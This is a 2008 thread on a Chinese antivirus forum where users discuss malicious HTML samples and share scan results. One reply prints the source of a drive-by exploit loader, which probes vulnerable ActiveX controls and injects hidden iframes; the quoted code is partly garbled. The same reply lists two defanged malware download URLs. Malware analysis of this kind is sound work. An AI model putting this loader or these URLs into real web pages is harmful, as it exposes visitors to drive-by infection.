查看: 3581|回复: 15
收起左侧

[病毒样本] 红伞分析师花了36小时

[复制链接]
hshhua01
发表于 2008-2-19 22:48:15 | 显示全部楼层 |阅读模式
找艳照时遇到的,报HEUR/Exploit.HTML,上报,36小时后终于有了回复
File ID  Filename  Size (Byte) Result
3728694  1[1].htm  451 Byte  MALWARE
3728695  login[1].htm  7.86 KB  MALWARE
3728696  pstang[1].htm  6.51 KB  MALWARE
3728697  wm[1].htm  3.82 KB  MALWARE

[ 本帖最后由 hshhua01 于 2008-2-19 22:49 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Joker
发表于 2008-2-19 22:51:57 | 显示全部楼层
集体打瞌睡了。。
spaceplane
发表于 2008-2-19 23:00:13 | 显示全部楼层
HTM到底算不算毒
allinwonderi
发表于 2008-2-19 23:01:30 | 显示全部楼层

回复 3楼 spaceplane 的帖子

我也纳闷了。
zzh161
发表于 2008-2-19 23:03:52 | 显示全部楼层
第一个找到:
hxxp://iii.chsip.net/cat.exe
hxxp://iii.chsip.net/down.exe


第二第三个没啥发现,第四个,不知道上一层链接,找不到下载地址,对应源代码是
function init(){document.write();}





ry{var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","lsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream""")}

catch(e){};

finally{



if(e!="[object Error]"){

  document.write("<iframe wdth=0 height=0 src=06014.htm frameborder=0></iframe>");}



try{var f;var storm=new ctiveXObject("MPS.StormPlayer");}

catch(f){};

finally{if(f!="[object Error]"){

doument.write("<iframe width=0 height=0 src=yyfb.htm frameborder=0></iframe>");}}

tryvar g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}

catch(g){};

finlly{if(g!="[object Error]"){

document.write("<iframe width=0 height=0 src=pps.htm fameborder=0></iframe>");}}

try{var h;var pps=new ActiveXObject("GLCHAT.GLChatCtrl.1);}

catch(h){};

finally{if(h!="[object Error]"){

document.write("<iframe width=0 eight=0 src=lz.htm frameborder=0></iframe>");}}

try{var ii;var pps=new ActiveXObjec("Pdg2");}

catch(ii){};

finally{if(ii!="[object Error]"){

document.write("<iframewidth=0 height=0 src=cx.htm frameborder=0></iframe>");}}



document.write("<iframe idth=0 height=0 src=IENoRun.htm frameborder=0></iframe>");

document.write("<iframe idth=0 height=0 src=xunlei.htm frameborder=0></iframe>");

document.write("<iframe wdth=0 height=0 src=07004.htm frameborder=0></iframe>");

document.write("<iframe widh=0 height=0 src=0733.htm frameborder=0></iframe>");

document.write("<iframe width= height=0 src=baidu.htm frameborder=0></iframe>");



}
yaofaye
发表于 2008-2-19 23:14:37 | 显示全部楼层
The scan has been done completely.

      0 Scanning directories
      6 Files were scanned
      0 viruses and/or unwanted programs were found
      1 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      1 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      6 Files not concerned
      1 Archives were scanned
      0 Warnings
      0 Notes
傻猪猪米走鸡
发表于 2008-2-20 00:10:06 | 显示全部楼层
其实有的真的会有格盘代码或这调用有害函数……
但几乎很多都是挂马……
然后那些马被我们的av砍掉……
qigang
发表于 2008-2-20 19:46:12 | 显示全部楼层

5/0

rising20.32.22未知!
Graybird
发表于 2008-2-20 19:50:15 | 显示全部楼层
Starting the file scan:

Begin scan in 'E:\Antivir\4.rar'
E:\Antivir\4.rar
  [0] Archive type: RAR
  --> 1[1].htm
      [DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Age.RRR.451
  --> login[1].htm
      [DETECTION] Contains detection pattern of the HTML script virus HTML/Click.DFG.8050
  --> pstang[1].htm
      [DETECTION] Contains detection pattern of the HTML script virus HTML/Click.TTT.6666
  --> wm[1].htm
      [DETECTION] Contains detection pattern of the Java script virus JS/Iframe.RRR.3911
      [WARNING]   The file was ignored!
Graybird
发表于 2008-2-20 19:51:20 | 显示全部楼层
---------------------------------------------------------
AVG Anti-Spyware - 扫描报告
---------------------------------------------------------

+ 创建时间:        19:52:43 2008-2-20

+ 扫描结果:       



E:\Antivir\4.rar/wm[1].htm -> Downloader.Agent.ib : 未进行操作.


::报告结束

1
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-13 15:10 , Processed in 0.123286 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表